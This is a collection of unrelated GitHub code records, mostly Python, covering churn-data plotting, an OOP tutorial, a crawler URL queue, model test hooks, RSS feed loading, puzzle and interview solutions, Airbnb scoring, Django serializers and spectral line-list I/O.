\r\n    st.write('# Distribution of Dataset')\r\n    # Create a 3 x 3 subplot grid\r\n    fig, axes = plt.subplots(3, 3, figsize=(12, 12))\r\n\r\n    # Get the list of numeric columns in the DataFrame\r\n    columns = num_cols\r\n\r\n    # Loop to draw a histogram for each column\r\n    for i, ax in enumerate(axes.flatten()):\r\n        if i < len(columns):\r\n            # Draw the histogram\r\n            sns.histplot(data=data, x=columns[i], kde=True, color='steelblue', alpha=0.7, ax=ax)\r\n            ax.set_xlabel(columns[i])\r\n            ax.set_ylabel('frequency')\r\n\r\n    # Arrange the subplot layout\r\n    plt.tight_layout()\r\n\r\n    # Display the plot\r\n    plt.show()\r\n    st.pyplot(fig)\r\n    st.markdown('---')\r\n    \r\n    st.write('# Scatterplot of Dataset')\r\n    fig = sns.pairplot(data = data[num_cols], hue = 'churn_risk_score', palette='Blues')\r\n    st.pyplot(fig)\r\n    st.markdown('---')\r\n    \r\n    st.write(\r\n        '''\r\n        Statement : \r\n\r\n        - Of the 37010 customers, ages range from 10 to 64 years with a mean of 37. Customers joined between 2015 and 2017 and last visited in 2023; on average a customer logs in around 14 times and spends around 279 hours on the website, and the longest gap since a last login is 26 days.\r\n\r\n        - Customers with an average transaction value above 50000 are unlikely to churn, while those below that value are more likely to churn. Customers with fewer than 750 points in the wallet are at a higher churn risk than those with more than 750 points.\r\n\r\n        - Churned customers outnumber retained ones; both genders churn at similar rates; customers in city and town regions show a high possibility of churn; the `no` and `basic` membership categories churn the most; and customers who give bad feedback show the highest churn.\r\n\r\n        - There is no significant correlation between the columns, and the distributions of the data are skewed\r\n        '''\r\n    )\r\n    \r\n    \r\nif __name__ == '__main__':\r\n    run()","repo_name":"farhandraka/Churn-Prediction-Using-ANN","sub_path":"deployment/eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":12329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"70756472466","text":"from datetime import datetime\r\n\r\n# Python Object-Oriented Programming\r\n    # Classes\r\n        # Used to create Objects (instances)\r\n        # Objects are the instances built from a class\r\n        # Classes are used to group data and functions together so they can be reused\r\n        #=======\r\n        # Class: Fruits\r\n        # Objects: Avocado, Banana...\r\n\r\n    # Constructors\r\n\r\n\r\n# Create the class\r\nclass Funcionarios:\r\n    def __init__(self, nome, sobrenome, ano_nascimento):\r\n        self.nome = nome\r\n        self.sobrenome = sobrenome\r\n        self.ano_nascimento = ano_nascimento\r\n\r\n    def nome_completo(self):\r\n        return self.nome + ' ' + self.sobrenome\r\n\r\n    def idade_funcionario(self):\r\n        ano_atual = datetime.now().year\r\n        # Compute the age without overwriting the stored birth year,\r\n        # so repeated calls keep returning the right value\r\n        return int(ano_atual - self.ano_nascimento)\r\n\r\n    \r\n# Create the objects (users) and pass the parameters\r\nusuario1 = Funcionarios('Elena', 'Cabral', 2009)\r\nusuario2 = Funcionarios('Karol', 'Silva', 2000)\r\nusuario3 = Funcionarios('Dimas', 'Reis', 1988)\r\n\r\n# 3 ways to print the data\r\nprint(usuario1.nome)\r\nprint(usuario3.nome_completo())\r\nprint(Funcionarios.nome_completo(usuario2))\r\n\r\nprint(Funcionarios.idade_funcionario(usuario2))\r\n","repo_name":"AlexDimas238/Python","sub_path":"POO/construtores.py","file_name":"construtores.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"8020349082","text":"import requests\n\nclass urlManager:\n    def __init__(self):\n        self.newUrls=set()\n        self.oldUrls=set()\n        self.nextUrls=set()\n        self.oldNextUrls=set()\n\n    def addUrl(self,url):\n        if not url:\n            return\n        if url in self.oldUrls:\n            return\n        self.newUrls.add(url)\n\n    def addNextUrl(self,url):\n        if not url:\n            return\n        if url in self.oldNextUrls:\n            return\n        self.nextUrls.add(url)\n\n    def addUrls(self,urls):\n        if not urls:\n            return\n        for url in urls:\n            self.addUrl(url)\n\n    def hasNewUrl(self):\n        return len(self.newUrls)!=0\n\n    def getUrl(self):\n        if len(self.newUrls)!=0:\n            \n            if len(self.newUrls)<10 and len(self.nextUrls)!=0:\n                url=self.newUrls.pop()\n                self.oldNextUrls.add(url)\n            else:\n                url=self.newUrls.pop()\n                self.oldUrls.add(url)\n            return 
url","repo_name":"Like-jian/ebay_spider","sub_path":"mylib/urlmanager.py","file_name":"urlmanager.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37622725768","text":"import torch\n\nfrom ..config import Config\nfrom .. import utils as U\nfrom .. import registry as R\nfrom .. import data as D\nfrom .runners import TestRunner\n\n\n@TestRunner.register_hook('test_begin')\ndef prepare_setup(ctx):\n \"\"\" initial ctx contains:\n - config\n - options (will be merged into config)\n - work_dir\n \"\"\"\n # load config\n assert ctx.is_not('config', None)\n if isinstance(ctx.config, str):\n ctx.config = Config.from_file(ctx.config)\n config = ctx.config\n\n # merge options\n assert ctx.isinstance('options', dict)\n config.merge(ctx.options)\n\n # work dir\n assert ctx.has('work_dir')\n ctx.work_dir = U.abspath(ctx.work_dir)\n U.mkdir(ctx.work_dir, exist_ok=True)\n\n # logger\n ctx.logger = U.get_root_logger(log_file=ctx.get('log_path'), log_level=ctx.options.log_level)\n\n # device (gpu)\n ctx.gpu_id = ctx.options.gpu_id\n assert isinstance(ctx.gpu_id, int) and ctx.gpu_id >= 0\n assert torch.cuda.is_available()\n ctx.device = torch.device('cuda', ctx.gpu_id)\n\n\n@TestRunner.register_hook('test_begin', dependency='prepare_setup')\ndef prepare_model(ctx):\n # model\n ctx.model = R.MODELS.create(ctx.config.model).to(ctx.device)\n ctx.dtype = ctx.model.dtype\n ctx.logger.info(f\"Built model {ctx.config.model.type}\")\n\n\n@TestRunner.register_hook('test_begin', dependency='prepare_model')\ndef prepare_data(ctx):\n data_cfg = ctx.config.data\n\n if ctx.has('data_test') and ctx.data_test:\n data_cfg.test = data_cfg[ctx.data_test]\n data_cfg.update_by_common(('data_source', 'data_params'), 'test')\n\n # data\n dataset_cfg = data_cfg.test.to_dict()\n dataloader_cfg = dataset_cfg.pop('data_loader', {})\n ctx.dataset = R.DATASETS.create(dataset_cfg)\n ctx.dataloader = D.get_dataloader(ctx.dataset, dataloader_cfg)\n ctx.logger.info(f\"Created dataloader of {ctx.dataset.name}: \"\n f\"batch_size = {ctx.dataloader.batch_size}, \"\n f\"num_workers = {ctx.dataloader.num_workers}\")\n\n\n@TestRunner.register_hook('test_begin', dependency='prepare_data')\ndef prepare_test(ctx):\n ctx.model.eval()\n ctx.model.call_before_eval(ctx)\n\n ctx.total_steps = len(ctx.dataloader)\n ctx.all_results = []\n\n\n@TestRunner.register_hook('test_iter_steps')\ndef iterate_test_step(ctx):\n ctx.progress_bar = U.ProgressBar(len(ctx.dataset), start=True)\n\n for i, batch in enumerate(ctx.dataloader):\n yield {'step': i,\n 'batch': batch,\n 'batch_size': batch['batch_size']}\n\n\n@TestRunner.register_hook('test_step_begin')\ndef prepare_test_step(ctx):\n pass\n\n\n@TestRunner.register_hook('test_step')\ndef do_test_step(ctx):\n with torch.no_grad():\n batch = U.to(ctx.batch, ctx.device, ctx.dtype)\n results = ctx.model.eval_step(batch['inputs'], batch)\n ctx.results = results\n\n if ctx.evaluate_mode == 'all':\n if not ctx.cache_step:\n ctx.all_results.append(results)\n else:\n ctx.dataset.cache_step(results, batch, ctx=ctx)\n elif ctx.evaluate_mode == 'step':\n ctx.dataset.evaluate_step(results, batch, ctx=ctx)\n\n for _ in range(ctx.batch_size):\n ctx.progress_bar.update()\n\n\n@TestRunner.register_hook('test_step_end')\ndef finish_test_step(ctx):\n pass\n\n\n@TestRunner.register_hook('test_end')\ndef finish_test(ctx):\n ctx.progress_bar.end()\n\n if ctx.evaluate_mode == 'all':\n results = 
ctx.dataset.evaluate_all(ctx.all_results, ctx=ctx)\n        if results:\n            ctx.logger.info('Evaluation results: \\n' + U.print_dict(results))\n\n    ctx.dataset.summarize()\n    ctx.model.call_after_eval(ctx)\n","repo_name":"netpaladinx/myzonelab","sub_path":"myzonecv/core/run_impl/test_hooks.py","file_name":"test_hooks.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"12414722379","text":"import json\nimport feedparser\n\n\"\"\"with Controller.from_port(port = 9051) as controller:\n    controller.authenticate(password='your password set for tor controller port in torrc')\n    print(\"Success!\")\n    controller.signal(Signal.NEWNYM)\n    print(\"New Tor connection processed\")\"\"\"\n\n\n\ndef cargar_fuentes():\n    \"\"\"FUNCTION THAT RETURNS THE DICTIONARY OF NEWS SOURCES FROM\n    fuentes_rss.json\"\"\"\n    with open(\"Archivos Json/fuentes_rss.json\", 'r', encoding=\"utf-8\") as fuentes_file:\n        diccionario_fuentes = json.load(fuentes_file)\n    return diccionario_fuentes\n\ndef consultas_feed():\n    diccionario_fuentes = cargar_fuentes()\n    # The variable diccionario_noticias_fuentes is a dictionary in which each\n    # key is the name of a source and the value for each key is a\n    # list of news items that have a given score (>0 or a top number\n    # of items)\n    diccionario_noticias_fuentes = dict()\n    # ------------------------------------------------------------------------\n    for diccionario_fuente in diccionario_fuentes[\"fuentes\"]:\n        nombre = diccionario_fuente[\"nombre\"]\n        print(nombre)\n        url = diccionario_fuente[\"url\"]\n        peso = diccionario_fuente[\"peso\"]\n        url_content = feedparser.parse(url)\n        diccionario_noticias_fuentes[nombre] = (nombre, url_content, peso)\n    return diccionario_noticias_fuentes\n","repo_name":"MatiasMingo/FinTech-News-Compiler","sub_path":"RSS/extract_rss.py","file_name":"extract_rss.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"10508314005","text":"from math import prod\n\ndata = []\nwith open(\"day3.input\") as f:\n    for line in f:\n        data.append(line.rstrip('\\n'))\n\nheight = len(data)\nwidth = len(data[0])\n\ndef count_trees(slope):\n    x = y = 0\n    tree_count = 0\n    while True:\n        x = (x + slope[0]) % width\n        y += slope[1]\n        if y >= height:\n            break\n        if data[y][x] == '#':\n            tree_count += 1\n    return tree_count\n\n# Part 1\nprint(count_trees((3, 1)))\n\n# Part 2\nslopes = [\n    (1, 1),\n    (3, 1),\n    (5, 1),\n    (7, 1),\n    (1, 2)\n    ]\n\nprint(prod(map(count_trees, slopes)))\n","repo_name":"Jemgoss/adventofcode","sub_path":"2020/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"4835690359","text":"# Balance Parentheses\n\"\"\"\nProblem Statement:\nA balanced sequence of parentheses is one in which every opening bracket has a corresponding closing bracket to it. \nMore formally, a sequence of parentheses is considered balanced if it can be represented in the form s1(s2) where both s1 and s2 are either empty or balanced strings.\n\nGiven a sequence of parentheses, find the minimum number of swaps needed to make the sequence balanced. It is not necessary to swap adjacent characters only. 
\nIf it is impossible to balance the string, return -1.\n\nExample:\nbrackets=\")()(())(\"\nSwap the characters at the first and last index to get \"(()(()))\" which is balanced. The string can be balanced with 1 swap.\n\nFunction Description\nComplete the function minimumSwaps in the editor below.\nminimumSwaps has the following parameter(s): \n    string brackets: the string to analyze\n\nReturns:\nint: the minimum number of swaps or -1\n\nConstraints:\n1 <= length of the string brackets <= 10^5\nbrackets consists of ')' and '(' only\n\n\"\"\"\n\n# Scan the string from left to right while tracking the running balance of\n# open brackets. A ')' that arrives when the balance is zero has no earlier\n# '(' partner, so it is counted as unmatched and the balance stays at zero.\n# At the end, the leftover balance is the number of unmatched '(' brackets;\n# balancing is only possible when it equals the number of unmatched ')'.\n# A single swap repairs one unmatched ')' and one unmatched '(' at the same\n# time, so the answer is ceil(unmatched / 2), i.e. (unmatched + 1) // 2.\n# This returns 1 for the worked example \")()(())(\" above.\n\ndef minimumSwaps(brackets):\n    # Running count of open brackets that still need a partner\n    balance = 0\n    \n    # Closed brackets that appeared before any possible partner\n    unmatched = 0\n    \n    # Iterate through the string from left to right\n    for ch in brackets:\n        # An open bracket raises the balance\n        if ch == '(':\n            balance += 1\n        # A closed bracket consumes an open one if available,\n        # otherwise it is unmatched\n        else:\n            if balance == 0:\n                unmatched += 1\n            else:\n                balance -= 1\n    \n    # Balancing is impossible unless '(' and ')' counts match exactly\n    if balance != unmatched:\n        return -1\n    \n    # Each swap fixes one unmatched ')' and one unmatched '(' at once\n    return (unmatched + 1) // 2\n\n
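\n# Quick sanity checks (illustrative additions, not part of the original\n# exercise file; they assume plain CPython with no test framework):\n# the worked example from the problem statement needs exactly one swap.\nassert minimumSwaps(\")()(())(\") == 1\nassert minimumSwaps(\")(\") == 1    # one swap yields \"()\"\nassert minimumSwaps(\"))((\") == 1  # swapping the outer pair yields \"()()\"\nassert minimumSwaps(\"((\") == -1   # unequal bracket counts can never balance\n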
\n# The same scan can be written with an explicit stack of open brackets\n# instead of a separate counter. The stack only ever holds '(' characters,\n# so it is equivalent to the integer counter above; it is shown here for\n# readers who prefer the classic stack formulation of bracket matching.\n\ndef minimumSwaps(brackets):\n    # Stack of open brackets that still need a partner\n    open_stack = []\n    \n    # Closed brackets that appeared before any possible partner\n    unmatched = 0\n    \n    # Iterate through the string from left to right\n    for ch in brackets:\n        # An open bracket goes onto the stack\n        if ch == '(':\n            open_stack.append(ch)\n        # A closed bracket pops its partner if one exists,\n        # otherwise it is counted as unmatched\n        elif open_stack:\n            open_stack.pop()\n        else:\n            unmatched += 1\n    \n    # Leftover '(' on the stack must exactly match the unmatched ')'\n    if len(open_stack) != unmatched:\n        return -1\n    \n    # Each swap repairs one unmatched ')' and one unmatched '('\n    return (unmatched + 1) // 2\n\n","repo_name":"satyajeetramnit/Placement-2023","sub_path":"Yubi-CredAvenue/minimumSwaps.py","file_name":"minimumSwaps.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"48"}
{"seq_id":"20003564710","text":"# Imports as always...\r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\nfrom datetime import datetime\r\nfrom textblob import TextBlob\r\n\r\nimport miscellaneous_helpers as mh\r\n\r\n\r\n# Primary function for computing success scores for given data.\r\ndef compute_scores(listing_directory, review_rate=0.72, min_price=1, max_price=10000):\r\n    '''\r\n    This function will read the data from listing_directory to generate the success score for each listing id.\r\n    We also set a minimum and maximum price, mainly to allow us to prevent erroneous data.\r\n\r\n    listing_directory will be a path (as a string) to the listings.csv file.\r\n    review_rate is the estimated (or known) ratio of the number of reviews to the number of bookings.\r\n    Brian Chesky, in his almighty wisdom, has claimed this is around 72%, so that will be the default.\r\n    min_price and max_price will be numerical values denoting the minimum price and maximum price.\r\n    Any listings with an advertised price outside of their defined range will be disregarded.\r\n\r\n    The return will be a dataframe with columns \"id\" and \"success_score\".\r\n    '''\r\n\r\n
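    # Worked example of the score (illustrative numbers, not taken from any\r\n    # dataset): 18 reviews in the last year gives 18 / 0.72 = 25 estimated\r\n    # bookings; with an average minimum stay of 4 nights that is 100\r\n    # occupied days, so the rental probability is 100 / 365 ~= 0.274. At a\r\n    # price of 150 (log price ~= 5.01) and a 4.5-star rating, the score is\r\n    # 0.274 * 5.01 * (4.5 / 5) ~= 1.24.\r\n\r\n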
    # Get the relevant data for estimating success.\r\n    success_data = pd.read_csv(listing_directory)[['id', 'price', 'minimum_nights_avg_ntm', 'number_of_reviews_ltm', 'review_scores_rating']]\r\n\r\n    # Remove listings lacking all the necessary data for success computation.\r\n    success_data = success_data.dropna()\r\n\r\n    # Transform price data...\r\n\r\n    # Convert prices to floats.\r\n    success_data.price = success_data.price.apply(lambda x : float(re.sub(',', '', x[1:])))\r\n\r\n    # Drop data where price is outside of the given range.\r\n    success_data = success_data[(success_data.price >= min_price) & (success_data.price <= max_price)]\r\n\r\n    # Apply log transformation.\r\n    success_data['log_price'] = np.log(success_data.price)\r\n\r\n    # Compute the success scores for each listing (where all data is available)...\r\n\r\n    successes = []\r\n\r\n    for i in range(len(success_data)):\r\n        listing = success_data.iloc[i]\r\n\r\n        # Following from Inside Airbnb's \"San Francisco Model\"...\r\n\r\n        estimated_bookings = listing.number_of_reviews_ltm / review_rate\r\n        occupied_days = estimated_bookings * listing.minimum_nights_avg_ntm\r\n        probability_of_rental = min(365, occupied_days) / 365\r\n\r\n        # Compute the success.\r\n        success = probability_of_rental * listing.log_price * (listing.review_scores_rating / 5)\r\n        successes.append(success)\r\n\r\n    return_data = pd.DataFrame({'id' : success_data.id, 'success_score' : successes})\r\n\r\n    return return_data","repo_name":"BenPrie/Airbnb-Unstructured-Data-Analysis","sub_path":"success_metric.py","file_name":"success_metric.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"32666209847","text":"from cv import models as cv_models\nfrom main import models as main_models\nfrom api.fields import PrimaryKeyRelatedIdField\nfrom api.serializers import ModelSerializer\nfrom api.handlers.cv.serializers import CvInlineShortSerializer\nfrom api.handlers.main.serializers.request.request import RequestInlineSerializer\n\n__all__ = [\n    'TimeSheetRowCreateSerializer',\n    'TimeSheetRowUpdateSerializer',\n    'TimeSheetRowReadSerializer',\n]\n\n\nclass TimeSheetRowBaseSerializer(ModelSerializer):\n    request_id = PrimaryKeyRelatedIdField(\n        queryset=main_models.Request.objects,\n        label=main_models.TimeSheetRow._meta.get_field('request').verbose_name,\n    )\n\n    class Meta:\n        model = main_models.TimeSheetRow\n        fields = [\n            'request_id', 'date_from', 'date_to', 'task_name', 'task_description', 'work_time',\n            'created_at', 'updated_at',\n        ]\n\n\nclass TimeSheetRowCreateSerializer(TimeSheetRowBaseSerializer):\n    cv_ids = PrimaryKeyRelatedIdField(\n        queryset=cv_models.CV.objects,\n        many=True, required=True,\n        label=main_models.TimeSheetRow._meta.get_field('cv').verbose_name,\n    )\n\n    class Meta(TimeSheetRowBaseSerializer.Meta):\n        fields = TimeSheetRowBaseSerializer.Meta.fields + [\n            'cv_ids',\n        ]\n\n\nclass TimeSheetRowUpdateSerializer(TimeSheetRowBaseSerializer):\n    cv_id = PrimaryKeyRelatedIdField(\n        queryset=cv_models.CV.objects,\n        label=main_models.TimeSheetRow._meta.get_field('cv').verbose_name,\n    )\n\n    class Meta(TimeSheetRowBaseSerializer.Meta):\n        fields = TimeSheetRowBaseSerializer.Meta.fields + ['cv_id', 'id']\n\n\nclass TimeSheetRowReadSerializer(TimeSheetRowUpdateSerializer):\n    request = RequestInlineSerializer()\n    cv = CvInlineShortSerializer()\n\n    class Meta(TimeSheetRowUpdateSerializer.Meta):\n        fields = TimeSheetRowUpdateSerializer.Meta.fields + [\n            'request', 'cv',\n        ]\n","repo_name":"skills-cloud/b2b-cloud","sub_path":"api/handlers/main/serializers/request/time_sheet.py","file_name":"time_sheet.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"5437513442","text":"def MassVote(N, Votes):\n    # find the maximum value in the array and its position\n    vote = 0\n    number = 0\n    for i in range(len(Votes)):\n        if Votes[i] > vote:\n            vote = Votes[i]\n            number = i\n\n    # check whether any other candidates have the same number of votes\n    count = 0\n    for i in range(N):\n        if Votes[i] == vote:\n            count += 1\n\n    # compute the percentage of votes for each candidate\n    sum = 0\n    for ani in Votes:\n        sum += ani # total votes = 100%\n    Persent = []\n    for i in range(N):\n        value = Votes[i] * 100 / sum\n        # round the resulting values to 3 decimal places\n        value = int(value * 10000)\n        value1 = value // 10\n        value2 = value % 10\n        if value2 >= 5:\n            value1 += 1\n        value = value1 / 1000\n        Persent.append(value)\n    \n    \n    if count == 1 and Persent[number] > 50.0:\n        result = \"majority winner \" + str(number + 1)\n    elif count == 1 and Persent[number] <= 50.0:\n        result = \"minority winner \" + str(number + 1)\n    elif count > 1:\n        result = \"no winner\"\n\n    return 
result","repo_name":"stankv/Studing","sub_path":"12_MassVote.py","file_name":"12_MassVote.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8663651886","text":"\"\"\" Module for I/O in arclines\n\"\"\"\nfrom __future__ import (print_function, absolute_import, division, unicode_literals)\n\nimport numpy as np\nimport os\nimport datetime\nimport pdb\n\nfrom astropy.table import Table, Column, vstack\nfrom astropy.io import fits\n\nfrom linetools import utils as ltu\n\nimport arclines # For path\nfrom arclines import defs\nline_path = arclines.__path__[0]+'/data/lists/'\nnist_path = arclines.__path__[0]+'/data/NIST/'\n\n\ndef load_by_hand():\n \"\"\" By-hand line list\n Parameters\n ----------\n line_file\n add_path\n\n Returns\n -------\n byhand : Table\n\n \"\"\"\n str_len_dict = defs.str_len()\n\n src_file = arclines.__path__[0]+'/data/sources/by_hand_list.ascii'\n # Read\n line_list = Table.read(src_file, format='ascii.fixed_width', comment='#')\n # Add\n line_list['NIST'] = 1\n # Deal with Instr and Source\n ilist, slist = [], []\n for row in line_list:\n ilist.append(defs.instruments()[row['sInstr']]) # May need to split\n slist.append(row['sSource'])\n line_list['Instr'] = ilist\n line_list['Source'] = np.array(slist, dtype='S{:d}'.format(str_len_dict['Source']))\n # Trim\n return line_list[['ion', 'wave', 'NIST', 'Instr', 'amplitude', 'Source']]\n\n\ndef load_line_list(line_file, add_path=False, use_ion=False, NIST=False):\n \"\"\"\n Parameters\n ----------\n line_file : str\n Full path to line_list or name of ion\n add_path : bool, optional\n Not yet implemented\n NIST : bool, optional\n NIST formatted table?\n\n Returns\n -------\n line_list : Table\n\n \"\"\"\n if use_ion:\n line_file = line_path+'{:s}_lines.dat'.format(line_file)\n line_list = Table.read(line_file, format='ascii.fixed_width', comment='#')\n # NIST?\n if NIST:\n # Remove unwanted columns\n tkeys = line_list.keys()\n for badkey in ['Ritz','Acc.','Type','Ei','Lower','Upper','TP','Line']:\n for tkey in tkeys:\n if badkey in tkey:\n line_list.remove_column(tkey)\n # Relative intensity -- Strip junk off the end\n reli = []\n for imsk, idat in zip(line_list['Rel.'].mask, line_list['Rel.'].data):\n if imsk:\n reli.append(0.)\n else:\n try:\n reli.append(float(idat))\n except ValueError:\n try:\n reli.append(float(idat[:-1]))\n except ValueError:\n reli.append(0.)\n line_list.remove_column('Rel.')\n line_list['RelInt'] = reli\n #\n gdrows = line_list['Observed'] > 0. 
# Eliminate dummy lines\n line_list = line_list[gdrows]\n line_list.rename_column('Observed','wave')\n # Others\n # Grab ion name\n i0 = line_file.rfind('/')\n i1 = line_file.rfind('_')\n ion = line_file[i0+1:i1]\n line_list.add_column(Column([ion]*len(line_list), name='Ion', dtype='U5'))\n line_list.add_column(Column([1]*len(line_list), name='NIST'))\n\n # Return\n return line_list\n\n\ndef load_line_lists(lines, unknown=False, skip=False, all=False, NIST=False):\n \"\"\" Loads a series of line list files\n\n Parameters\n ----------\n lamps : list\n unknown : bool, optional\n skip : bool, optional\n Skip missing line lists (mainly for building)\n NIST : bool, optional\n Load the full NIST linelists\n\n Returns\n -------\n line_list : Table\n\n \"\"\"\n import glob\n\n # All?\n if all:\n line_files = glob.glob(line_path+'*_lines.dat')\n lines = []\n for line_file in line_files:\n i0 = line_file.rfind('/')\n i1 = line_file.rfind('_')\n lines.append(line_file[i0+1:i1])\n\n # Read standard files\n lists = []\n for line in lines:\n if NIST:\n line_file = nist_path+'{:s}_vacuum.ascii'.format(line)\n else:\n line_file = line_path+'{:s}_lines.dat'.format(line)\n if not os.path.isfile(line_file):\n if not skip:\n import pdb; pdb.set_trace()\n raise IOError(\"Input line {:s} is not included in arclines\".format(line))\n else:\n lists.append(load_line_list(line_file, NIST=NIST))\n # Stack\n if len(lists) == 0:\n return None\n line_lists = vstack(lists, join_type='exact')\n\n # Unknown\n if unknown:\n unkn_lines = load_unknown_list(lines)\n unkn_lines.remove_column('line_flag') # may wish to have this info\n # Stack\n line_lists = vstack([line_lists, unkn_lines])\n\n # Return\n return line_lists\n\n\ndef load_source_table():\n \"\"\" Load table of arcline sources\n\n Returns\n -------\n sources : Table\n\n \"\"\"\n src_file = arclines.__path__[0]+'/data/sources/arcline_sources.ascii'\n # Load\n sources = Table.read(src_file, format='ascii.fixed_width', comment='#')\n # Return\n return sources\n\n\ndef load_nist(ion):\n \"\"\"Parse a NIST ASCII table. Note that the long ---- should have\n been commented out and also the few lines at the start.\n\n Parameters\n ----------\n ion : str\n Name of ion\n Returns\n -------\n tbl : Table\n Table of lines\n \"\"\"\n import glob\n # Root (for development only)\n root = arclines.__path__[0]\n # Find file\n srch_file = root + '/data/NIST/'+ion+'_vacuum.ascii'\n nist_file = glob.glob(srch_file)\n if len(nist_file) == 0:\n raise IOError(\"Cannot find NIST file {:s}\".format(srch_file))\n # Read\n nist_tbl = Table.read(nist_file[0], format='ascii.fixed_width')\n gdrow = nist_tbl['Observed'] > 0. 
# Eliminate dummy lines\n nist_tbl = nist_tbl[gdrow]\n # Now unique values only (no duplicates)\n uniq, indices = np.unique(nist_tbl['Observed'],return_index=True)\n nist_tbl = nist_tbl[indices]\n # Deal with Rel\n agdrel = []\n for row in nist_tbl:\n try:\n gdrel = int(row['Rel.'])\n except:\n try:\n gdrel = int(row['Rel.'][:-1])\n except:\n gdrel = 0\n agdrel.append(gdrel)\n agdrel = np.array(agdrel)\n # Remove and add\n nist_tbl.remove_column('Rel.')\n nist_tbl.remove_column('Ritz')\n nist_tbl['RelInt'] = agdrel\n #nist_tbl.add_column(Column([ion]*len(nist_tbl), name='Ion', dtype='S5'))\n nist_tbl.add_column(Column([ion]*len(nist_tbl), name='Ion', dtype='U5'))\n nist_tbl.rename_column('Observed','wave')\n # Return\n return nist_tbl\n\n\ndef load_unknown_list(lines, unknwn_file=None, all=False):\n \"\"\"\n Parameters\n ----------\n lines : list\n Restricted lines; use all=True for all\n unknwn_file : str, optional\n all : bool, optional\n\n\n Returns\n -------\n unknwn_lines : Table\n\n \"\"\"\n line_dict = defs.lines()\n # Load\n line_path = arclines.__path__[0]+'/data/lists/'\n if unknwn_file is None:\n unknwn_file = line_path+'UNKNWNs.dat'\n line_list = load_line_list(unknwn_file)\n # Cut on input lamps?\n if all:\n return line_list\n else:\n msk = np.array([False]*len(line_list))\n for line in lines:\n line_flag = line_dict[line]\n match = line_list['line_flag'] % (2*line_flag) >= line_flag\n msk[match] = True\n # Finish\n return line_list[msk]\n\ndef load_spectrum(spec_file, index=0):\n \"\"\" Load a simple spectrum from input file\n\n Parameters\n ----------\n spec_file : str\n .fits -- Assumes simple ndarray in 0 extension\n .ascii -- Assumes Table.read(format='ascii') will work with single column\n\n Returns\n -------\n\n \"\"\"\n import h5py\n iext = spec_file.rfind('.')\n if 'ascii' in spec_file[iext:]:\n tbl = Table.read(spec_file, format='ascii')\n key = tbl.keys()[0]\n spec = tbl[key].data\n elif 'fits' in spec_file[iext:]:\n spec = fits.open(spec_file)[0].data\n elif 'hdf5' in spec_file[iext:]:\n hdf = h5py.File(spec_file, 'r')\n if 'arcs' in hdf.keys():\n print(\"Taking arc={:d} in this file\".format(index))\n spec = hdf['arcs/'+str(index)+'/spec'].value\n else:\n raise IOError(\"Not ready for this hdf5 file\")\n elif 'json' in spec_file[iext:]:\n jdict = ltu.loadjson(spec_file)\n try:\n spec = np.array(jdict['spec'])\n except KeyError:\n raise IOError(\"spec not in your JSON dict\")\n # Return\n return spec\n\ndef write_line_list(tbl, outfile):\n \"\"\"\n Parameters\n ----------\n tbl\n outfile\n \"\"\"\n # Format\n tbl['wave'].format = '10.4f'\n # Write\n with open(outfile,'w') as f:\n f.write('# Creation Date: {:s}\\n'.format(str(datetime.date.today().strftime('%Y-%b-%d'))))\n tbl.write(f, format='ascii.fixed_width')\n","repo_name":"pypeit/arclines","sub_path":"arclines/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":8770,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20090241891","text":"import heapq\n\ndef make_edges(road):\n edges = {}\n for (a,b,w) in road:\n edges[a] = edges.get(a, []) + [(b, w)]\n edges[b] = edges.get(b, []) + [(a, w)]\n return edges\n\ndef solution(N, road, K):\n answer = 0\n INF = float(\"inf\")\n distance = [INF] * (N + 1)\n distance[1] = 0\n queue = []\n edges = make_edges(road)\n heapq.heappush(queue,[0,1])\n processed = [0] * (N + 1)\n while queue:\n node = heapq.heappop(queue)[1]\n if processed[node]:\n continue\n processed[node] = 1\n for arrive, weight in 
edges[node]:\n if distance[arrive] > weight + distance[node]:\n distance[arrive] = weight + distance[node]\n heapq.heappush(queue,[distance[arrive],arrive])\n for i in distance:\n if i <= K:\n answer += 1\n return answer","repo_name":"alibreo3754/Study_Algorithm","sub_path":"Python/programmers/lv3_delivery.py","file_name":"lv3_delivery.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36055434925","text":"#Hashing the output as well as the correct answer prevents cheating\nimport hashlib\n#System functions (for print capture):\nimport sys\nfrom cStringIO import StringIO\n\n#Setting up the input and output redirection:\nbackup_stdin = sys.stdin\nbackup_stdout = sys.stdout\nname_input = 'Lee Cardholder'\nbalance_input = 120.50\nsys.stdin = StringIO('{0:s}\\n{1:f}'.format(name_input,balance_input))\nsys.stdout = StringIO()\n#The exercise script:\nimport exercises.input as proj_input\n#Getting the printed values into a list of strings:\nprinted_output = sys.stdout.getvalue().lower().splitlines()\nprinted_output_nospaces = [''.join(line.split()) for line in printed_output]\n#Closing the stream and restoring normal 